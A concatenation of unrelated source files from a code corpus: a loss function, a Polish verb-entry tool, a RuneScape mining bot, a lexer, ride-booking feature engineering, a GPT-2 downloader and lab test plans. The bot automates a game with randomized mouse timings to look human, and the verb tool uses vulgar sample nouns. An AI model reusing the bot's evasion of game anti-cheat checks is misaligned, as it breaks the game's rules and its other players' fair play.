return losses
def _get_src_permutation_idx(self, indices):
# permute predictions following indices
batch_idx = torch.cat([torch.full_like(src, i) for i, (src, _) in enumerate(indices)])
src_idx = torch.cat([src for (src, _) in indices])
return batch_idx, src_idx
def _get_tgt_permutation_idx(self, indices):
# permute targets following indices
batch_idx = torch.cat([torch.full_like(tgt, i) for i, (_, tgt) in enumerate(indices)])
tgt_idx = torch.cat([tgt for (_, tgt) in indices])
return batch_idx, tgt_idx
def get_loss(self, loss, outputs, targets, indices, num_planes, **kwargs):
loss_map = {
'labels': self.loss_labels,
'param': self.loss_param,
'loss_cardinality': self.loss_cardinality,
'embedding': self.loss_embedding,
'Q': self.loss_Q,
'center': self.loss_center,
'depth': self.loss_depth,
'prob_pixel': self.loss_prob_pixel
}
assert loss in loss_map, f'do you really want to compute {loss} loss?'
return loss_map[loss](outputs, targets, indices, num_planes, **kwargs)
def forward(self, outputs, targets):
""" This performs the loss computation.
Parameters:
outputs: dict of tensors, see the output specification of the model for the format
targets: list of dicts, such that len(targets) == batch_size.
The expected keys in each dict depends on the losses applied, see each loss' doc
"""
outputs_without_aux = {k: v for k, v in outputs.items() if k != 'aux_outputs'}
# Retrieve the matching between the outputs of the last layer and the targets
indices = self.matcher(outputs_without_aux, targets)
# Compute the average number of target boxes accross all nodes, for normalization purposes
num_planes = sum(tgt.shape[0] for tgt in targets)
num_planes = torch.as_tensor([num_planes], dtype=torch.float, device=next(iter(outputs.values())).device)
if is_dist_avail_and_initialized():
torch.distributed.all_reduce(num_planes)
num_planes = torch.clamp(num_planes / get_world_size(), min=1).item()
# Compute all the requested losses
losses = {}
for loss in self.losses:
# print(loss)
losses.update(self.get_loss(loss, outputs, targets, indices, num_planes))
# print(loss, 'end-', '*'*10)
# In case of auxiliary losses, we repeat this process with the output of each intermediate layer.
losses_aux = []
if 'aux_outputs' in outputs.keys():
for i, aux_outputs in enumerate(outputs['aux_outputs']):
losses_aux_i = {}
# print(aux_outputs.keys())
# continue
# indices = self.matcher(aux_outputs, targets)
for loss in self.losses:
kwargs = {}
# if 'embedding' in loss:
# continue
if 'param' in loss or 'Q' in loss or 'depth' in loss: #or 'embedding' in loss:
continue
# Logging is enabled only for the last layer
kwargs = {'log': False}
l_dict = self.get_loss(loss, aux_outputs, targets, indices, num_planes, **kwargs)
# l_dict = {k + f'_{i}': v for k, v in l_dict.items()}
losses_aux_i.update(l_dict)
losses_aux.append(losses_aux_i)
return losses, indices, losses_aux |
the-stack_106_30645 | import json
import _pickle as pickle
from wordclasses import Verb
from grammarconstants import PAST,PRESENT,FUTURE,MALE,FEMALE,NEUTER,SINGULAR,PLURAL,FIRST,SECOND,THIRD,PERFECT,IMPERFECT
def inputS(s):
st = input(s)
if st == 'x':
sys.exit()
with open('verbs.pkl','rb+') as f:
obj = pickle.load(f)
verbs=obj['verbs']
transitives=obj['transitives']
intransitives=obj['intransitives']
ditransitives=obj['ditransitive']
linkings=obj['linkings']
auxiliaries=obj['auxiliaries']
f.close()
print("Adding new verb")
print()
# Generate english variations of the verb
engInfinitive=input("english infinitive: ")
engPastTensePerfect=input("english past tense perfect: ")
engPastTenseImperfectSingular=input("english past tense imperfect singular: ")
engPastTenseImperfectPlural=input("english past tense imperfect plural: ")
engPresentTenseSingularFirst= input("english present tense singular first: ")
engPresentTenseSingular=input("english present tense singular third: ")
engPresentTensePlural=input("english present tense plural: ")
engFutureTensePerfect=input("english future tense perfect: ")
engFutureTenseImperfect=input("english future tense imperfect: ")
# Set english variations on the verb
engVerbVariants = Verb.initVerbVariants()
for i in range(3):
for j in range(2):
for k in range(3):
if j == PLURAL or k == SECOND:
engVerbVariants[PAST][i][j][k][IMPERFECT]=engPastTenseImperfectPlural
engVerbVariants[PRESENT][i][j][k][PERFECT]=engPresentTensePlural
engVerbVariants[PRESENT][i][j][k][IMPERFECT]=engPresentTensePlural
else:
engVerbVariants[PAST][i][j][k][IMPERFECT]=engPastTenseImperfectSingular
if k == FIRST:
engVerbVariants[PRESENT][i][j][k][IMPERFECT]=engPresentTenseSingularFirst
else:
engVerbVariants[PRESENT][i][j][k][IMPERFECT]=engPresentTenseSingular
engVerbVariants[PRESENT][i][j][k][PERFECT]=engPresentTenseSingular
engVerbVariants[PAST][i][j][k][PERFECT]=engPastTensePerfect
engVerbVariants[FUTURE][i][j][k][PERFECT]=engFutureTensePerfect
engVerbVariants[FUTURE][i][j][k][IMPERFECT]=engFutureTenseImperfect
# Get type of verb (which verb groups to add it to)
if input("transitive? (he "+engPresentTenseSingular+" the ball)")=="y":
transitives.append(len(verbs))
else:
pass
if input("intransitive? (he "+engPresentTenseSingular+")")=="y":
intransitives.append(len(verbs))
else:
pass
if input("ditransitive (uses an indirect object)") == "y":
ditransitives.append(len(verbs))
else:
pass
if input("linking? (links the subject to a noun or an adjective)") == "y":
linkings.append(len(verbs))
else:
pass
if input("auxiliary? (be, do, have) comes before another verb to provide extra information") == "y":
auxiliaries.append(len(verbs))
else:
pass
# Init nouns to make interface easier to handle (so user can see which variation of the verb to input)
nouns = Verb.initVerbVariants()
pnouns = Verb.initVerbVariants()
for i in range(3):
for j in range(2):
# Initialise English nouns
nouns[i][MALE][SINGULAR][FIRST][j]="I (male)"
nouns[i][MALE][SINGULAR][SECOND][j]="you (male)"
nouns[i][MALE][SINGULAR][THIRD][j]="the kitten"
nouns[i][MALE][PLURAL][FIRST][j]="we (male)"
nouns[i][MALE][PLURAL][SECOND][j]="you (plural,male)"
nouns[i][MALE][PLURAL][THIRD][j]="the penises"
nouns[i][FEMALE][SINGULAR][FIRST][j]="I (female)"
nouns[i][FEMALE][SINGULAR][SECOND][j]="you (female)"
nouns[i][FEMALE][SINGULAR][THIRD][j]="the book"
nouns[i][FEMALE][PLURAL][FIRST][j]="we (female)"
nouns[i][FEMALE][PLURAL][SECOND][j]="you (plural,female)"
nouns[i][FEMALE][PLURAL][THIRD][j]="the pussies"
nouns[i][NEUTER][SINGULAR][THIRD][j]="the egg"
nouns[i][NEUTER][PLURAL][THIRD][j]="jajka"
# Init Polish nouns
pnouns[i][MALE][SINGULAR][FIRST][j]="ja"
pnouns[i][MALE][SINGULAR][SECOND][j]="ty"
pnouns[i][MALE][SINGULAR][THIRD][j]="kotek"
pnouns[i][MALE][PLURAL][FIRST][j]="my"
pnouns[i][MALE][PLURAL][SECOND][j]="wy"
pnouns[i][MALE][PLURAL][THIRD][j]="penisy"
pnouns[i][FEMALE][SINGULAR][FIRST][j]="ja"
pnouns[i][FEMALE][SINGULAR][SECOND][j]="ty"
pnouns[i][FEMALE][SINGULAR][THIRD][j]="książka"
pnouns[i][FEMALE][PLURAL][FIRST][j]="my"
pnouns[i][FEMALE][PLURAL][SECOND][j]="wy"
pnouns[i][FEMALE][PLURAL][THIRD][j]="cipki"
pnouns[i][NEUTER][SINGULAR][THIRD][j]="jajko"
polishInfinitive = input("polish infinitive: ")
# Collect input from user on polish variation on the verb
verbVariants = Verb.initVerbVariants()
for i in range(3):
for j in range(3):
for k in range(2):
for l in range(3):
for m in range(2):
if i == PRESENT and j == FEMALE:
verbVariants[i][j][k][l][m]=verbVariants[i][MALE][k][l][m]
elif (j == NEUTER and l == FIRST) or (j == NEUTER and l == SECOND):
pass
elif j == NEUTER and k == PLURAL:
verbVariants[i][j][k][l][m]=verbVariants[i][FEMALE][k][l][m]
elif i == PRESENT and m == PERFECT:
verbVariants[i][j][k][l][m]=verbVariants[i][j][k][l][IMPERFECT]
elif i == FUTURE and m == IMPERFECT:
verbVariants[i][j][k][l][m] = verbs[0].variants[i][j][k][l][m]+" "+polishInfinitive
else:
verbVariants[i][j][k][l][m] = input(nouns[i][j][k][l][m]+" "+engVerbVariants[i][j][k][l][m]+": "+pnouns[i][j][k][l][m]+" ")
verbs.append(Verb(engInfinitive,polishInfinitive,verbVariants))
with open('verbs.pkl','wb+') as f:
pickle.dump(obj,f)
f.close()
|
the-stack_106_30647 | import numpy as np
import os
import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import zipfile
import cv2
from mss import mss
import pyautogui
import time
import PySimpleGUI as sg
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from numpy import array
from utils import label_map_util
import random
from utils import visualization_utils as vis_util
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
import six
from six.moves import range
from six.moves import zip
# This is needed since the notebook is stored in the object_detection folder.
sys.path.append("..")
# script repurposed from sentdex's edits and TensorFlow's example script. Pretty messy as not all unnecessary
# parts of the original have been removed
# # Model preparation
# ## Variables
#
# Any model exported using the `export_inference_graph.py` tool can be loaded here simply by changing `PATH_TO_CKPT` to point to a new .pb file.
#
# By default we use an "SSD with Mobilenet" model here. See the [detection model zoo](https://github.com/tensorflow/models/blob/master/object_detection/g3doc/detection_model_zoo.md) for a list of other models that can be run out-of-the-box with varying speeds and accuracies.
# What model to download.
MODEL_NAME = 'output_inference_graph.pb' # change to whatever folder has the new graph
# MODEL_FILE = MODEL_NAME + '.tar.gz' # these lines not needed as we are using our own model
# DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join('training', 'object-detection.pbtxt') # our labels are in training/object-detection.pbkt
NUM_CLASSES = 2 # we only are using one class at the moment (mask at the time of edit)
# ## Download Model
# opener = urllib.request.URLopener() # we don't need to download model since we have our own
# opener.retrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)
# tar_file = tarfile.open(MODEL_FILE)
# for file in tar_file.getmembers():
# file_name = os.path.basename(file.name)
# if 'frozen_inference_graph.pb' in file_name:
# tar_file.extract(file, os.getcwd())
# ## Load a (frozen) Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# ## Loading label map
# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
def load_image_into_numpy_array(image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
# For the sake of simplicity we will use only 2 images:
# image1.jpg
# image2.jpg
# If you want to test the code with your images, just add path to the images to the TEST_IMAGE_PATHS.
PATH_TO_TEST_IMAGES_DIR = 'testImages'
TEST_IMAGE_PATHS = [os.path.join(PATH_TO_TEST_IMAGES_DIR, 'image{}.jpeg'.format(i)) for i in range(1, 8)] # adjust range for # of images in folder
# Size, in inches, of the output images.
IMAGE_SIZE = (12, 8)
sg.theme('DarkAmber')
layout = [ [sg.Text('Runescape Bot')],
#[sg.Text('Password'), sg.InputText()],
[sg.Checkbox('Tin Ore', default=True, key = "tin_ore")],
[sg.Checkbox('Clay Ore', default=True, key = "clay_ore")],
[sg.Button('Start'), sg.Button('Stop'), sg.Button('Exit')],
[sg.Checkbox('Drop Items', default=True, key = "dropInvent")] ]
window = sg.Window('Runescape AI', layout, keep_on_top=True, location=(10,50), resizable=True, auto_size_text=True, no_titlebar=True)
monSize = pyautogui.size()
mon1width = monSize[0] # 2560
mon1height = monSize[1] # 1080
mon2width = 2560
mon2height = 1080
#screenshot = mss.mss().grab(window)
sct = mss()
mon2 = sct.monitors[1]
bounding_box = {'top': mon2['top'] + 0, 'left': mon2['left'] + 0, 'width': mon2width, 'height': mon2height}
class spot:
def __init__(self, ymin, xmin, ymax, xmax, box_class_name):
self.xmin = xmin * mon1width
self.xmax = xmax * mon1width
self.ymin = ymin * mon1height
self.ymax = ymax * mon1height
self.centerX = ((xmax * mon1width) + (xmin * mon1width)) / 2
self.centerY = ((ymax * mon1height) + (ymin * mon1height)) / 2
self.class_name = box_class_name
currentMillis = time.time() * 1000
prevMillis = currentMillis
timeDelta = random.randint(4,5) * 1000
teleportStartupDelay = 20000
teleportDelta = 20000
runAgent = True
harvestStatus = False
waiting = False
inventoryGuiPos = [2245, 1020]
magicBookGuiPos = [2345, 1020]
homeTeleportGuiPos = [2380, 745]
bankDepositIterator = 0
travelBool = False
bankTravelPath = [[2542, 81], [2517, 47], [2478, 34], [2452, 40], [2463, 35], [2503, 39], [2528, 58],
[2428, 54], [2407, 94], [2463, 37], [2438, 46], [2471, 34], [2470, 36], [2433, 48],
[2416, 70], [2484, 65]]
bankItemsPath = [[1532, 538], [1533, 581], [1354, 825]]
mineTravelPath = [[2443, 169], [2458, 178], [2496, 177], [2512, 172]]
def bankItems(bankPath, bankInteraction, minePath, bankDepositIterator):
print("pong")
if bankDepositIterator <= len(bankTravelPath):
pyautogui.click(bankPath[bankDepositIterator][0], bankPath[bankDepositIterator][1], duration = np.random.uniform(0.2, 0.6))
elif bankDepositIterator <= (len(bankTravelPath) + len(bankInteraction)):
pyautogui.click(bankItemsPath[0][0], bankItemsPath[0][1], duration = np.random.uniform(0.2, 0.6), button = 'right')
pyautogui.click(bankItemsPath[1][0], bankItemsPath[1][1] + 27, duration = np.random.uniform(0.1, 0.3))
pyautogui.click(bankItemsPath[2][0], bankItemsPath[2][0], duration = np.random.uniform(0.1, 0.3))
elif bankDepositIterator <= (len(bankTravelPath) + len(bankInteraction) + len(mineTravelPath)):
pyautogui.click(bankPath[bankDepositIterator - len(bankTravelPath) - len(minePath)][0], bankPath[bankDepositIterator - len(bankTravelPath - len(minePath))][1], duration = np.random.uniform(0.2, 0.6))
def homeTeleport():
pyautogui.moveTo(magicBookGuiPos[0], magicBookGuiPos[1], duration = np.random.uniform(0.2, 0.6))
pyautogui.click()
pyautogui.click(homeTeleportGuiPos[0], homeTeleportGuiPos[1], duration = np.random.uniform(0.2, 0.6), button = 'right')
pyautogui.click(homeTeleportGuiPos[0], homeTeleportGuiPos[1] + 27, duration = np.random.uniform(0.1, 0.3))
pyautogui.click(inventoryGuiPos[0], inventoryGuiPos[1], duration = np.random.uniform(0.1, 0.3))
firstInventoryPos = [2400, 760]
dropButtonDistance = 40
def dropFirstItem():
pyautogui.click(firstInventoryPos[0], firstInventoryPos[1], button = 'right', duration = np.random.uniform(0.1, 0.2))
pyautogui.click(firstInventoryPos[0], firstInventoryPos[1] + dropButtonDistance, duration = np.random.uniform(0.05, 0.1))
estNumHarvested = 0
# Harvest Config:
harvestConfig = {
"tin_ore" : True,
"clay_ore" : True
}
dropInvent = True
with detection_graph.as_default():
with tf.Session(graph=detection_graph) as sess:
while True:
img = pyautogui.screenshot()
frame = np.array(img)
image_np = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
#print(pyautogui.position()) # Cursor Position Finder
currentMillis = time.time() * 1000
currentPos = pyautogui.position()
#### GUI handling ####
event, values = window.read(timeout=0)
if event == sg.WIN_CLOSED or event == 'Exit': # if user closes window or clicks cancel
break
if event == 'Start':
print("starting harvest")
harvestStatus = True
if event == 'Stop':
print("stopping harvest")
harvestStatus = False
if values["dropInvent"] == True:
dropInvent = True
elif values["dropInvent"] == False:
dropInvent = False
if values["clay_ore"] == True:
harvestConfig["clay_ore"] = True
elif values["clay_ore"] == False:
harvestConfig["clay_ore"] = False
if values["tin_ore"] == True:
harvestConfig["tin_ore"] = True
elif values["tin_ore"] == False:
harvestConfig["tin_ore"] = False
window.Refresh()
######################
if estNumHarvested == -1:
runAgent = False
#print("finishing task")
if((currentMillis - prevMillis) >= teleportStartupDelay + teleportDelta):
prevMillis = currentMillis
print("completing teleport")
waiting = False
runAgent = True
estNumHarvested += 1
elif((currentMillis - prevMillis) >= teleportStartupDelay):
if waiting == False:
waiting = True
print("starting teleport")
homeTeleport()
if travelBool:
#print((len(bankTravelPath) + len(bankItemsPath) + len(mineTravelPath)))
if((currentMillis - prevMillis) >= 30000):
prevMillis = currentMillis
print("ping")
if bankDepositIterator <= (len(bankTravelPath) + len(bankItemsPath) + len(mineTravelPath)):
print("travleing path point: ", bankDepositIterator)
bankItems(bankTravelPath, bankItemsPath, mineTravelPath, bankDepositIterator)
bankDepositIterator += 1
else:
print("arrived")
travelBool = False
if runAgent:
#ret, image_np = cap.read()
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(frame, axis=0)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = detection_graph.get_tensor_by_name('detection_scores:0')
classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
#print(np.squeeze(scores))
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index,
use_normalized_coordinates=True,
line_thickness=4)
sboxes = np.squeeze(boxes)
sscore = np.squeeze(scores)
sclasses = np.squeeze(classes)
minScore = 0.5
locations = []
for i in range(sboxes.shape[0]):
if scores is None or sscore[i] > minScore:
#class_name = category_index[classes[0]]['name']
#print(six.viewkeys(category_index))
if sclasses[i] in six.viewkeys(category_index):
box_class_name = category_index[sclasses[i]]['name']
box = tuple(sboxes[i].tolist())
boxx = spot(box[0], box[1], box[2], box[3], box_class_name)
locations.append(boxx)
#for i in locations:
# print("xmin: ", i.xmin, " xmax: ", i.xmax, " ymin: ", i.ymin," ymax: ", i.ymax,)
if harvestStatus and (currentPos[0] > 0 and currentPos[0] < monSize[0]):
currentMillis = time.time() * 1000
if((currentMillis - prevMillis) >= timeDelta):
prevMillis = currentMillis
if len(locations) > 0:
for location in locations:
if harvestConfig[location.class_name] == True:
if dropInvent == True:
dropFirstItem()
estNumHarvested += 1
#print(location.class_name)
xcord = location.centerX
ycord = location.centerY
xmin = location.xmin
ymin = location.ymin
xmax = location.xmax
ymax = location.ymax
#pyautogui.click(xcord, ycord, duration = np.random.uniform(0.2, 0.6))
pyautogui.moveTo(xcord, ycord, duration = np.random.uniform(0.1, 0.4))
pyautogui.click()
break
#pyautogui.moveTo(xmin, ymin, duration = 0)q
#pyautogui.moveTo(xmax, ymin, duration = 1)
#pyautogui.moveTo(xmax, ymax, duration = 1)
#pyautogui.moveTo(xmin, ymax, duration = 1)
#pyautogui.moveTo(xmin, ymin, duration = 1)
#print("xmin: ", xmin, " xmax: ", xmax, " ymin: ", ymin," ymax: ", ymax)
#print("click at: center x: ", xcord, " center y: ", ycord)
cv2.imshow('screen', cv2.resize(np.array(image_np), (int(mon2width/2), int(mon2height/2))))
if cv2.waitKey(25) & 0xFF == ord('p'):
print("p pressed")
if runAgent == True:
runAgent = False
elif runAgent == False:
runAgent = True
if cv2.waitKey(25) & 0xFF == ord('h'):
homeTeleport()
if cv2.waitKey(25) & 0xFF == ord('t'):
dropFirstItem()
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
window.close() |
the-stack_106_30648 | # coding: utf-8
"""
@Topic:
@Date: 2021/1/29
@Author: other.z
@Copyright(C): 2020-2023 other.z Inc. All rights reserved.
"""
import json
import ply.lex
class LexerError(Exception):
pass
class Lexer:
def tokenize(self, string, debug=False):
"""
Maps a string to an iterator over tokens. In other words: [char] -> [token]
:param string:
:param debug:
:return:
"""
new_lexer = ply.lex.lex(module=self, debug=debug)
new_lexer.latest_newline = 0
new_lexer.string_value = None
new_lexer.input(string)
while True:
t = new_lexer.token()
if t is None: break
t.col = t.lexpos - new_lexer.latest_newline
yield t
if new_lexer.string_value is not None:
raise LexerError('Unexpected EOF in string literal or identifier')
literals = '#@$&{.[](=,)}'
reserved_words = {'V': 'VARIABLE', 'P': 'PARAMETER'}
tokens = [
'ID',
'NUMBER',
'STRING'
] + list(reserved_words.values())
t_ignore = ' \t'
def t_ID(self, t):
r"""[a-zA-Z_][a-zA-Z0-9_]*"""
t.type = self.reserved_words.get(t.value, 'ID')
return t
def t_NUMBER(self, t):
r"""-?\d+"""
t.value = int(t.value)
return t
def t_STRING(self, t):
r"""\"([^\\\n]|(\\.))*?\""""
t.value = json.loads(t.value)
return t
# Counting lines, handling errors
def t_newline(self, t):
r"""\n"""
t.lexer.lineno += 1
t.lexer.latest_newline = t.lexpos
def t_error(self, t):
raise LexerError('Error on line %s, col %s: Unexpected character: %s ' % (
t.lexer.lineno, t.lexpos - t.lexer.latest_newline, t.value[0]))
if __name__ == '__main__':
def main():
data = '''22.035fads@!$$$'''
# data = '"9fdsafd*.\ssd/${aaa}"'
lexer = Lexer()
for token in lexer.tokenize(data):
print(token)
main() |
the-stack_106_30649 | import logging
import click
from pathlib import Path
import pandas as pd
import numpy as np
import geopy.distance
import datetime
import pytz
from src.filename import BOOKING_PREPROCESSED, PARTICIPANT_PREPROCESSED, TEST_PREPROCESSED, TRAIN_TRANSFORMED, TRAIN, TEST
def cal_dist(row):
lat_x, long_x, lat_y, long_y = row['pickup_latitude'], row['pickup_longitude'], row['driver_latitude'], row['driver_longitude']
coord_x = (lat_x, long_x)
coord_y = (lat_y, long_y)
return geopy.distance.distance(coord_x, coord_y).km
def is_peak(row):
local_tz = pytz.timezone('Asia/Jakarta')
utc_ts = row['event_timestamp']
try:
utc_ts = datetime.datetime.strptime(utc_ts, '%Y-%m-%d %H:%M:%S+00:00')
except:
utc_ts = datetime.datetime.strptime(utc_ts, '%Y-%m-%d %H:%M:%S.%f000+00:00')
local_dt = utc_ts.replace(tzinfo=pytz.utc).astimezone(local_tz)
day = local_dt.isoweekday()
time = local_dt.time()
if 1 <= day <= 4:
if ((time >= datetime.time(7, 0)) and (time <= datetime.time(10, 0))) | ((time >= datetime.time(17, 0)) and (time <= datetime.time(20, 0))):
return 1
else:
return 0
else:
if ((time >= datetime.time(8, 0)) and (time <= datetime.time(10, 0))) | ((time >= datetime.time(17, 0)) and (time <= datetime.time(23, 59))):
return 1
else:
return 0
def train_transform(input_filepath, output_filepath):
booking = pd.read_csv(input_filepath + '/%s' % BOOKING_PREPROCESSED)
driver = pd.read_csv(input_filepath + '/%s' % PARTICIPANT_PREPROCESSED)
# create base dataset, each row represents one booking allocation
# output indicates whether the allocation trip is completed
# having the same columns as test, except output (to be predicted for test data)
created_booking_cols = ['event_timestamp', 'order_id','trip_distance', 'pickup_latitude', 'pickup_longitude']
created = booking[booking.booking_status =='CREATED'][created_booking_cols]
completed_booking_cols = ['order_id', 'driver_id']
completed = booking[booking.booking_status == 'COMPLETED'][completed_booking_cols]
booking_base = pd.merge(created, completed, on=['order_id'], how='left').rename(columns={'driver_id':'booking_driver_id'})
driver_cols = ['order_id', 'driver_id', 'driver_latitude', 'driver_longitude', 'driver_gps_accuracy']
driver_base = driver[driver_cols]
train_transformed = pd.merge(driver_base, booking_base, on=['order_id'], how='left')
train_transformed['output'] = np.where(train_transformed['driver_id'] == train_transformed['booking_driver_id'], 1, 0)
train_transformed = train_transformed.drop(columns = "booking_driver_id")
train_transformed.to_csv(output_filepath + '/%s' % TRAIN_TRANSFORMED, index=False)
def create_feature(df, failed, completed):
df = pd.merge(df, failed, on ='driver_id', how='left').fillna(0)
df = pd.merge(df, completed, on ='driver_id', how='left').fillna(0)
# distance between pickup and driver location
df['pickup_distance'] = df.apply(cal_dist, axis=1)
# check is booking CREATED timestamp is in peak hour
# defined by gojek official website, considering Jarkata timezone
df['is_peak'] = df.apply(is_peak, axis=1)
return df
def feature_eng(input_filepath, output_filepath):
# create new features
train = pd.read_csv(output_filepath + '/%s' % TRAIN_TRANSFORMED)
test = pd.read_csv(input_filepath + '/%s' % TEST_PREPROCESSED)
# number of times a driver is allocated but failed to complete trip (regardless failure reason)
train['failed'] = np.where(train['output'] == 1, 0, 1)
failed = train.groupby(['driver_id'], as_index=False)['failed'].sum().rename(columns={'failed': 'total_failed'})
# number of times a driver completes trip
train['completed'] = np.where(train['output'] == 1, 1, 0)
completed = train.groupby(['driver_id'], as_index=False)['completed'].sum().rename(columns={'completed': 'total_completed'})
train = create_feature(train, failed, completed)
test = create_feature(test, failed, completed)
train.to_csv(output_filepath + '/%s' % TRAIN, index=False)
test.to_csv(output_filepath + '/%s' % TEST, index=False)
logger = logging.getLogger(__name__)
logger.info('making processed data set from interim data')
@click.command()
@click.argument('input_filepath', type=click.Path(exists=True))
@click.argument('output_filepath', type=click.Path())
def main(input_filepath, output_filepath):
train_transform(input_filepath, output_filepath)
feature_eng(input_filepath, output_filepath)
if __name__ == '__main__':
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
main()
|
the-stack_106_30651 | import os
import sys
import requests
from tqdm import tqdm
if len(sys.argv) != 2:
print('You must enter the model name as a parameter, e.g.: download_model.py 124M')
sys.exit(1)
model = sys.argv[1]
subdir = os.path.join('models', model)
if not os.path.exists(subdir):
os.makedirs(subdir)
subdir = subdir.replace('\\','/') # needed for Windows
for filename in ['checkpoint','encoder.json','hparams.json','model.ckpt.data-00000-of-00001', 'model.ckpt.index', 'model.ckpt.meta', 'vocab.bpe']:
r = requests.get("https://openaipublic.blob.core.windows.net/gpt-2/" + subdir + "/" + filename, stream=True)
with open(os.path.join("src",subdir, filename), 'wb') as f:
file_size = int(r.headers["content-length"])
chunk_size = 1000
with tqdm(ncols=100, desc="Fetching " + filename, total=file_size, unit_scale=True) as pbar:
# 1k for chunk_size, since Ethernet packet size is around 1500 bytes
for chunk in r.iter_content(chunk_size=chunk_size):
f.write(chunk)
pbar.update(chunk_size)
|
the-stack_106_30652 | # Contain plan headers for testing of queue execution for BMM beamline
# Plans: mv, xafs, change_edge, shb_close_plan, set_slot
from ophyd.sim import hw
from bluesky.plans import count, scan
from bluesky.plan_stubs import mv # noqa: F401
from bluesky_queueserver.manager.profile_tools import set_user_ns
det1, det2, motor = hw().det1, hw().det2, hw().motor
# Those are devices used with 'mv' plans
xafs_x = motor
xafs_y = motor
slits3_hsize = motor
xafs_det = motor
@set_user_ns
def xafs(inifile=None, *, user_ns, **kwargs):
yield from count([det1, det2], num=5, delay=1)
@set_user_ns
def change_edge(
el, focus=False, edge="K", energy=None, slits=True, target=300.0, xrd=False, bender=True, *, user_ns
):
yield from scan([det1, det2], motor, -1, 1, 10)
def shb_close_plan():
yield from count([det1, det2])
def slot(n):
yield from count([det1])
|
the-stack_106_30654 | import sys
import yaml
import argparse
import re
import pandas as pd
import subprocess
import shlex
from pathlib import Path
from collections import defaultdict
from collections import namedtuple
sys.path.append(str(Path.home().joinpath('wrmXpress/modules')))
from get_wells import get_wells
from get_image_paths import get_image_paths
from convert_video import convert_video
from dense_flow import dense_flow
from segment_worms import segment_worms
from generate_thumbnails import generate_thumbnails
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# required positional arguments
parser.add_argument('parameters',
help='Path to the paramaters.yml file.')
parser.add_argument('plate',
help='Plate to be analyzed.')
args = parser.parse_args()
######################################
######### GET PARAMETERS #########
######################################
# read the parameters from the YAML
with open(args.parameters, 'rb') as f:
# BaseLoader reads everything as a string, won't recognize boolean
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
# read the modules, remove any where run is False
species = conf.get('species')[0]
stages = conf.get('stages')[0]
modules = conf.get('modules')
print('modules:')
for key, value in modules.copy().items():
if value['run'] is False:
print("\t\t{}: {}".format(key, value['run']))
del modules[key]
else:
print("\t\t{}: {}".format(key, value['run']))
if 'cellprofiler' in modules.keys():
for py_mod in ['segment', 'motility', 'convert']:
if py_mod in modules.keys():
raise ValueError(
"'{}' cannot be used with 'cellprofiler'".format(py_mod))
# save the parameters in variables
wells = conf.get('wells') # list of wells or 'all'
work = conf.get('directories').get('work')[0] # string
input = conf.get('directories').get('input')[0] # string
output = conf.get('directories').get('output')[0] # string
# plate = conf.get('directories').get('plate')[0] # string
plate = args.plate
plate_short = re.sub('_[0-9]*$', '', plate) # string
# define directories
input = Path.home().joinpath(input)
work = Path.home().joinpath(work)
output = Path.home().joinpath(output)
plate_dir = Path.home().joinpath(input, plate)
# HTD
with open(plate_dir.joinpath(plate_short + '.HTD'), encoding='utf-8', errors='ignore') as f:
lines = f.readlines()
time_points = int(
next((s for s in lines if 'TimePoints' in s), None).split(', ')[1])
columns = int(
next((s for s in lines if 'XWells' in s), None).split(', ')[1])
rows = int(
next((s for s in lines if 'YWells' in s), None).split(', ')[1])
x_sites = int(
next((s for s in lines if 'XSites' in s), None).split(', ')[1])
y_sites = int(
next((s for s in lines if 'YSites' in s), None).split(', ')[1])
n_waves = int(
next((s for s in lines if 'NWavelengths' in s), None).split(', ')[1])
# loop to get all the WaveNames
wave_names = []
for i in range(n_waves):
name = 'WaveName' + str(i + 1)
wave_name = next((s for s in lines if name in s),
None).split(', ')[1]
wave_names.append(wave_name.rstrip().replace('"', ''))
# pool global variables into namedtuple (g)
g = namedtuple(
'g', 'input work output plate_dir plate plate_short species stages time_points columns rows x_sites y_sites n_waves wave_names wells plate_paths')
g = g(input, work, output, plate_dir, plate, plate_short, species, stages, time_points,
columns, rows, x_sites, y_sites, n_waves, wave_names, wells, '')
######################################
######### GET WELLS & PATHS #########
######################################
# get the wells and well paths
try:
if 'All' in wells:
wells = get_wells(g)
plate_paths = get_image_paths(g, wells)
else:
